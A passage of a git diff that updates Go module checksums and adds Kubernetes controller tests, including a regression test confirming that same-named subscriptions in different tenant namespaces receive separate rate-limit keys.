h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/emicklei/go-restful/v3 v3.12.2 h1:DhwDP0vY3k8ZzE0RunuJy8GhNpPL6zqLkDf9B/a0/xU= github.com/emicklei/go-restful/v3 v3.12.2/go.mod h1:6n3XBCmQQb25CM2LCACGz8ukIrRry+4bhvbpWn3mrbc= -github.com/envoyproxy/go-control-plane v0.13.4 
h1:zEqyPVyku6IvWCFwux4x9RxkLOMUL+1vC9xUFv5l2/M= -github.com/envoyproxy/go-control-plane v0.13.4/go.mod h1:kDfuBlDVsSj2MjrLEtRWtHlsWIFcGyB2RMO44Dc5GZA= -github.com/envoyproxy/go-control-plane/envoy v1.32.4 h1:jb83lalDRZSpPWW2Z7Mck/8kXZ5CQAFYVjQcdVIr83A= -github.com/envoyproxy/go-control-plane/envoy v1.32.4/go.mod h1:Gzjc5k8JcJswLjAx1Zm+wSYE20UrLtt7JZMWiWQXQEw= +github.com/envoyproxy/go-control-plane v0.14.0 h1:hbG2kr4RuFj222B6+7T83thSPqLjwBIfQawTkC++2HA= +github.com/envoyproxy/go-control-plane v0.14.0/go.mod h1:NcS5X47pLl/hfqxU70yPwL9ZMkUlwlKxtAohpi2wBEU= +github.com/envoyproxy/go-control-plane/envoy v1.36.0 h1:yg/JjO5E7ubRyKX3m07GF3reDNEnfOboJ0QySbH736g= +github.com/envoyproxy/go-control-plane/envoy v1.36.0/go.mod h1:ty89S1YCCVruQAm9OtKeEkQLTb+Lkz0k8v9W0Oxsv98= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0 h1:/G9QYbddjL25KvtKTv3an9lx6VBE2cnb8wp1vEGNYGI= github.com/envoyproxy/go-control-plane/ratelimit v0.1.0/go.mod h1:Wk+tMFAFbCXaJPzVVHnPgRKdUdwW/KdbRt94AzgRee4= -github.com/envoyproxy/protoc-gen-validate v1.2.1 h1:DEo3O99U8j4hBFwbJfrz9VtgcDfUKS7KJ7spH3d86P8= -github.com/envoyproxy/protoc-gen-validate v1.2.1/go.mod h1:d/C80l/jxXLdfEIhX1W2TmLfsJ31lvEjwamM4DxlWXU= +github.com/envoyproxy/protoc-gen-validate v1.3.0 h1:TvGH1wof4H33rezVKWSpqKz5NXWg5VPuZ0uONDT6eb4= +github.com/envoyproxy/protoc-gen-validate v1.3.0/go.mod h1:HvYl7zwPa5mffgyeTUHA9zHIH36nmrm7oCbo4YKoSWA= github.com/evanphx/json-patch v5.9.0+incompatible h1:fBXyNpNMuTTDdquAq/uisOr2lShz4oaXpDTX2bLe7ls= github.com/evanphx/json-patch v5.9.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= github.com/evanphx/json-patch/v5 v5.9.11 h1:/8HVnzMq13/3x9TPvjG08wUGqBTmZBsCWzjTM0wiaDU= @@ -73,6 +73,8 @@ github.com/fsnotify/fsnotify v1.9.0 h1:2Ml+OJNzbYCTzsxtv8vKSFD9PbJjmhYF14k/jKC7S github.com/fsnotify/fsnotify v1.9.0/go.mod h1:8jBTzvmWwFyi3Pb8djgCCO5IBqzKJ/Jwo8TRcHyHii0= github.com/fxamacker/cbor/v2 v2.8.0 h1:fFtUGXUzXPHTIUdne5+zzMPTfffl3RD5qYnkY40vtxU= github.com/fxamacker/cbor/v2 
v2.8.0/go.mod h1:vM4b+DJCtHn+zz7h3FFp/hDAI9WNWCsZj23V5ytsSxQ= +github.com/go-jose/go-jose/v4 v4.1.3 h1:CVLmWDhDVRa6Mi/IgCgaopNosCaHz7zrMeF9MlZRkrs= +github.com/go-jose/go-jose/v4 v4.1.3/go.mod h1:x4oUasVrzR7071A4TnHLGSPpNOm2a21K9Kf04k1rs08= github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A= github.com/go-logr/logr v1.4.3 h1:CjnDlHq8ikf6E492q6eKboGOC0T8CDaOvkHCIg8idEI= github.com/go-logr/logr v1.4.3/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= @@ -198,6 +200,8 @@ github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0t github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= github.com/spf13/pflag v1.0.6 h1:jFzHGLGAlb3ruxLB8MhbI6A8+AQX/2eW4qeyNZXNp2o= github.com/spf13/pflag v1.0.6/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= +github.com/spiffe/go-spiffe/v2 v2.6.0 h1:l+DolpxNWYgruGQVV0xsfeya3CsC7m8iBzDnMpsbLuo= +github.com/spiffe/go-spiffe/v2 v2.6.0/go.mod h1:gm2SeUoMZEtpnzPNs2Csc0D/gX33k1xIx7lEzqblHEs= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/objx v0.5.2 h1:xuMeJ0Sdp5ZMRXx/aWO6RZxdr3beISkG5/G/aIRr3pY= github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA= @@ -212,8 +216,8 @@ go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= -go.opentelemetry.io/contrib/detectors/gcp v1.34.0 h1:JRxssobiPg23otYU5SbWtQC//snGVIM3Tx6QRzlQBao= -go.opentelemetry.io/contrib/detectors/gcp v1.34.0/go.mod h1:cV4BMFcscUR/ckqLkbfQmF0PRsq8w/lMGzdbCSveBHo= +go.opentelemetry.io/contrib/detectors/gcp v1.39.0 h1:kWRNZMsfBHZ+uHjiH4y7Etn2FK26LAGkNFw7RHv1DhE= +go.opentelemetry.io/contrib/detectors/gcp 
v1.39.0/go.mod h1:t/OGqzHBa5v6RHZwrDBJ2OirWc+4q/w2fTbLZwAKjTk= go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0 h1:rgMkmiGfix9vFJDcDi1PK8WEQP4FLQwLDfhp5ZLpFeE= go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.59.0/go.mod h1:ijPqXp5P6IRRByFVVg9DY8P5HkxkHE5ARIa+86aXPf4= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.60.0 h1:sbiXRNDSWJOTobXh5HyQKjq6wUC5tNybqjIqDpAY4CU= @@ -242,8 +246,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= -golang.org/x/crypto v0.39.0 h1:SHs+kF4LP+f+p14esP5jAoDpHU8Gu/v9lFRK6IT5imM= -golang.org/x/crypto v0.39.0/go.mod h1:L+Xg3Wf6HoL4Bn4238Z6ft6KfEpN0tJGo53AAPC632U= +golang.org/x/crypto v0.46.0 h1:cKRW/pmt1pKAfetfu+RCEvjvZkA9RimPbh7bhFjGVBU= +golang.org/x/crypto v0.46.0/go.mod h1:Evb/oLKmMraqjZ2iQTwDwvCtJkczlDuTmdJXoZVzqU0= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js= @@ -255,8 +259,8 @@ golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHl golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE= golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= -golang.org/x/mod v0.25.0 h1:n7a+ZbQKQA/Ysbyb0/6IbB1H/X41mKgbhfv7AfG/44w= -golang.org/x/mod 
v0.25.0/go.mod h1:IXM97Txy2VM4PJ3gI61r1YEk/gAj6zAHN3AdZt6S9Ww= +golang.org/x/mod v0.30.0 h1:fDEXFVZ/fmCKProc/yAXXUijritrDzahmwwefnjoPFk= +golang.org/x/mod v0.30.0/go.mod h1:lAsf5O2EvJeSFMiBxXDki7sCgAxEUcZHXoXMKT4GJKc= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= @@ -269,13 +273,13 @@ golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= -golang.org/x/net v0.41.0 h1:vBTly1HeNPEn3wtREYfy4GZ/NECgw2Cnl+nK6Nz3uvw= -golang.org/x/net v0.41.0/go.mod h1:B/K4NNqkfmg07DQYrbwvSluqCJOOXwUjeb/5lOisjbA= +golang.org/x/net v0.48.0 h1:zyQRTTrjc33Lhh0fBgT/H3oZq9WuvRR5gPC70xpDiQU= +golang.org/x/net v0.48.0/go.mod h1:+ndRgGjkh8FGtu1w1FGbEC31if4VrNVMuKTgcAAnQRY= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= -golang.org/x/oauth2 v0.30.0 h1:dnDm7JmhM45NNpd8FDDeLhK6FwqbOf4MLCM9zb1BOHI= -golang.org/x/oauth2 v0.30.0/go.mod h1:B++QgG3ZKulg6sRPGD/mqlHQs5rB3Ml9erfeDY7xKlU= +golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= +golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod 
h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= @@ -283,8 +287,8 @@ golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJ golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.15.0 h1:KWH3jNZsfyT6xfAfKiz6MRNmd46ByHDYaZ7KSkCtdW8= -golang.org/x/sync v0.15.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA= +golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4= +golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -296,14 +300,14 @@ golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.40.0 h1:DBZZqJ2Rkml6QMQsZywtnjnnGvHza6BTfYFWY9kjEWQ= golang.org/x/sys v0.40.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks= -golang.org/x/term v0.32.0 h1:DR4lr0TjUs3epypdhTOkMmuF5CDFJ/8pOnbzMZPQ7bg= -golang.org/x/term v0.32.0/go.mod h1:uZG1FhGx848Sqfsq4/DlJr3xGGsYMu/L5GW4abiaEPQ= +golang.org/x/term v0.38.0 h1:PQ5pkm/rLO6HnxFR7N2lJHOZX6Kez5Y1gDSJla6jo7Q= +golang.org/x/term v0.38.0/go.mod 
h1:bSEAKrOT1W+VSu9TSCMtoGEOUcKxOKgl3LE5QEF/xVg= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/text v0.26.0 h1:P42AVeLghgTYr4+xUnTRKDMqpar+PtX7KWuNQL21L8M= -golang.org/x/text v0.26.0/go.mod h1:QK15LZJUUQVJxhz7wXgxSy/CJaTFjd0G+YLonydOVQA= +golang.org/x/text v0.32.0 h1:ZD01bjUt1FQ9WJ0ClOL5vxgxOI/sVCNgX1YtKwcY0mU= +golang.org/x/text v0.32.0/go.mod h1:o/rUWzghvpD5TXrTIBuJU77MTaN0ljMWE47kxGJQ7jY= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.12.0 h1:ScB/8o8olJvc+CQPWrK3fPZNfh7qgwCrY0zJmoEQLSE= @@ -321,14 +325,16 @@ golang.org/x/tools v0.0.0-20190628153133-6cdbf07be9d0/go.mod h1:/rFqwRUd4F7ZHNgw golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= -golang.org/x/tools v0.34.0 h1:qIpSLOxeCYGg9TrcJokLBG4KFA6d795g0xkBkiESGlo= -golang.org/x/tools v0.34.0/go.mod h1:pAP9OwEaY1CAW3HOmg3hLZC5Z0CCmzjAF2UQMSqNARg= +golang.org/x/tools v0.39.0 h1:ik4ho21kwuQln40uelmciQPp9SipgNDdrafrYA4TmQQ= +golang.org/x/tools v0.39.0/go.mod h1:JnefbkDPyD8UU2kI5fuf8ZX4/yUeh9W877ZeBONxUqQ= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors 
v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= gomodules.xyz/jsonpatch/v2 v2.5.0 h1:JELs8RLM12qJGXU4u/TO3V25KW8GreMKl9pdkk14RM0= gomodules.xyz/jsonpatch/v2 v2.5.0/go.mod h1:AH3dM2RI6uoBZxn3LVrfvJ3E0/9dG4cSrbuBJT4moAY= +gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= +gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= google.golang.org/api v0.7.0/go.mod h1:WtwebWUNSVBH/HAw79HIFXZNqEvBhG+Ra+ax0hx3E3M= google.golang.org/api v0.8.0/go.mod h1:o4eAsZoiT+ibD93RtjEohWalFOjRDx6CVaqeizhEnKg= @@ -347,17 +353,17 @@ google.golang.org/genproto v0.0.0-20190502173448-54afdca5d873/go.mod h1:VzzqZJRn google.golang.org/genproto v0.0.0-20190801165951-fa694d86fc64/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb h1:ITgPrl429bc6+2ZraNSzMDk3I95nmQln2fuPstKwFDE= google.golang.org/genproto v0.0.0-20250303144028-a0af3efb3deb/go.mod h1:sAo5UzpjUwgFBCzupwhcLcxHVDK7vG5IqI30YnwX2eE= -google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb h1:p31xT4yrYrSM/G4Sn2+TNUkVhFCbG9y8itM2S6Th950= -google.golang.org/genproto/googleapis/api v0.0.0-20250303144028-a0af3efb3deb/go.mod h1:jbe3Bkdp+Dh2IrslsFCklNhweNTBgSYanP1UXhJDhKg= -google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4 h1:iK2jbkWL86DXjEx0qiHcRE9dE4/Ahua5k6V8OWFb//c= -google.golang.org/genproto/googleapis/rpc v0.0.0-20250313205543-e70fdf4c4cb4/go.mod h1:LuRYeWDFV6WOn90g357N17oMCaxpgCnbi/44qJvDn2I= +google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 h1:fCvbg86sFXwdrl5LgVcTEvNC+2txB5mgROGmRL5mrls= +google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217/go.mod 
h1:+rXWjjaukWZun3mLfjmVnQi18E1AsFbDN9QdJ5YXLto= +google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 h1:gRkg/vSppuSQoDjxyiGfN4Upv/h/DQmIR10ZU8dh4Ww= +google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217/go.mod h1:7i2o+ce6H/6BluujYR+kqX3GKH+dChPTQU19wjRPiGk= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= google.golang.org/grpc v1.21.1/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= -google.golang.org/grpc v1.71.1 h1:ffsFWr7ygTUscGPI0KKK6TLrGz0476KUvvsbqWK0rPI= -google.golang.org/grpc v1.71.1/go.mod h1:H0GRtasmQOh9LkFoCPDu3ZrwUtD1YGE+b2vYBYd/8Ec= -google.golang.org/protobuf v1.36.6 h1:z1NpPI8ku2WgiWnf+t9wTPsn6eP1L7ksHUlkfLvd9xY= -google.golang.org/protobuf v1.36.6/go.mod h1:jduwjTPXsFjZGTmRluh+L6NjiWu7pchiJ2/5YcXBHnY= +google.golang.org/grpc v1.79.3 h1:sybAEdRIEtvcD68Gx7dmnwjZKlyfuc61Dyo9pGXXkKE= +google.golang.org/grpc v1.79.3/go.mod h1:KmT0Kjez+0dde/v2j9vzwoAScgEPx/Bw1CYChhHLrHQ= +google.golang.org/protobuf v1.36.10 h1:AYd7cD/uASjIL6Q9LiTjz8JLcrh/88q5UObnmY3aOOE= +google.golang.org/protobuf v1.36.10/go.mod h1:HTf+CrKn2C3g5S8VImy6tdcUvCska2kB7j23XfzDpco= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= diff --git a/maas-controller/pkg/controller/maas/cross_namespace_test.go b/maas-controller/pkg/controller/maas/cross_namespace_test.go index 5137c8859..bafdc977d 100644 --- a/maas-controller/pkg/controller/maas/cross_namespace_test.go +++ b/maas-controller/pkg/controller/maas/cross_namespace_test.go @@ -86,7 +86,7 @@ func TestMaaSAuthPolicyReconciler_CrossNamespace(t *testing.T) { 
WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}). Build() - r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme} + r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"} req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasPolicyName, Namespace: policyNamespace}} if _, err := r.Reconcile(context.Background(), req); err != nil { t.Fatalf("Reconcile: unexpected error: %v", err) @@ -182,7 +182,7 @@ func TestMaaSAuthPolicyReconciler_SelectiveModelManagement(t *testing.T) { WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}). Build() - r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme} + r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"} req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasPolicyName, Namespace: policyNamespace}} if _, err := r.Reconcile(context.Background(), req); err != nil { t.Fatalf("Reconcile: unexpected error: %v", err) @@ -261,7 +261,7 @@ func TestMaaSAuthPolicyReconciler_SameNameDifferentNamespaces(t *testing.T) { WithStatusSubresource(&maasv1alpha1.MaaSAuthPolicy{}). Build() - r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme} + r := &MaaSAuthPolicyReconciler{Client: c, Scheme: scheme, MaaSAPINamespace: "maas-system"} // Reconcile both policies reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: "policy-a", Namespace: namespaceA}} @@ -390,6 +390,187 @@ func TestMaaSSubscriptionReconciler_CrossNamespace(t *testing.T) { } } +// TestMaaSSubscriptionReconciler_DuplicateNameIsolation verifies that two +// subscriptions with the same name in different namespaces get unique TRLP +// limit keys and don't cause quota isolation bypass (CWE-284, CWE-706). 
+// +// This test validates the fix for the vulnerability where: +// - Tenant A has subscription "gold" (namespace: tenant-a) with limit 100 req/min +// - Tenant B has subscription "gold" (namespace: tenant-b) with limit 10000 req/min +// - Both reference the same model (default/llm) +// - Before fix: TRLP key collision → last subscription wins +// - After fix: Unique keys (namespace-name-model) → proper isolation +func TestMaaSSubscriptionReconciler_DuplicateNameIsolation(t *testing.T) { + const ( + modelName = "llm" + modelNamespace = "models" + httpRouteName = "maas-model-" + modelName + trlpName = "maas-trlp-" + modelName + subscriptionName = "gold" // SAME name in both namespaces + namespaceA = "tenant-a" + namespaceB = "tenant-b" + ) + + // Model and HTTPRoute (shared by both subscriptions) + model := &maasv1alpha1.MaaSModelRef{ + ObjectMeta: metav1.ObjectMeta{Name: modelName, Namespace: modelNamespace}, + Spec: maasv1alpha1.MaaSModelSpec{ + ModelRef: maasv1alpha1.ModelReference{Kind: "ExternalModel", Name: modelName}, + }, + } + route := &gatewayapiv1.HTTPRoute{ + ObjectMeta: metav1.ObjectMeta{Name: httpRouteName, Namespace: modelNamespace}, + } + + // Subscription "gold" in tenant-a namespace (limit: 100) + subA := &maasv1alpha1.MaaSSubscription{ + ObjectMeta: metav1.ObjectMeta{Name: subscriptionName, Namespace: namespaceA}, + Spec: maasv1alpha1.MaaSSubscriptionSpec{ + Owner: maasv1alpha1.OwnerSpec{ + Groups: []maasv1alpha1.GroupReference{{Name: "team-a"}}, + }, + ModelRefs: []maasv1alpha1.ModelSubscriptionRef{ + { + Name: modelName, + Namespace: modelNamespace, + TokenRateLimits: []maasv1alpha1.TokenRateLimit{{Limit: 100, Window: "1m"}}, + }, + }, + }, + } + + // Subscription "gold" in tenant-b namespace (limit: 10000) - SAME NAME! 
+ subB := &maasv1alpha1.MaaSSubscription{ + ObjectMeta: metav1.ObjectMeta{Name: subscriptionName, Namespace: namespaceB}, + Spec: maasv1alpha1.MaaSSubscriptionSpec{ + Owner: maasv1alpha1.OwnerSpec{ + Groups: []maasv1alpha1.GroupReference{{Name: "team-b"}}, + }, + ModelRefs: []maasv1alpha1.ModelSubscriptionRef{ + { + Name: modelName, + Namespace: modelNamespace, + TokenRateLimits: []maasv1alpha1.TokenRateLimit{{Limit: 10000, Window: "1m"}}, + }, + }, + }, + } + + c := fake.NewClientBuilder(). + WithScheme(scheme). + WithRESTMapper(testRESTMapper()). + WithObjects(model, route, subA, subB). + WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}). + Build() + + r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme} + + // Reconcile both subscriptions + reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: subscriptionName, Namespace: namespaceA}} + if _, err := r.Reconcile(context.Background(), reqA); err != nil { + t.Fatalf("Reconcile subscription in %q: unexpected error: %v", namespaceA, err) + } + + reqB := ctrl.Request{NamespacedName: types.NamespacedName{Name: subscriptionName, Namespace: namespaceB}} + if _, err := r.Reconcile(context.Background(), reqB); err != nil { + t.Fatalf("Reconcile subscription in %q: unexpected error: %v", namespaceB, err) + } + + // Get the aggregated TRLP for the model + trlp := &unstructured.Unstructured{} + trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"}) + if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: modelNamespace}, trlp); err != nil { + t.Fatalf("Get TokenRateLimitPolicy: %v", err) + } + + limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits") + if err != nil || !found { + t.Fatalf("spec.limits not found: found=%v err=%v", found, err) + } + + // CRITICAL: Verify both subscriptions have UNIQUE limit entries + // Format: "{namespace}-{name}-{model}-tokens" + keyA := namespaceA + 
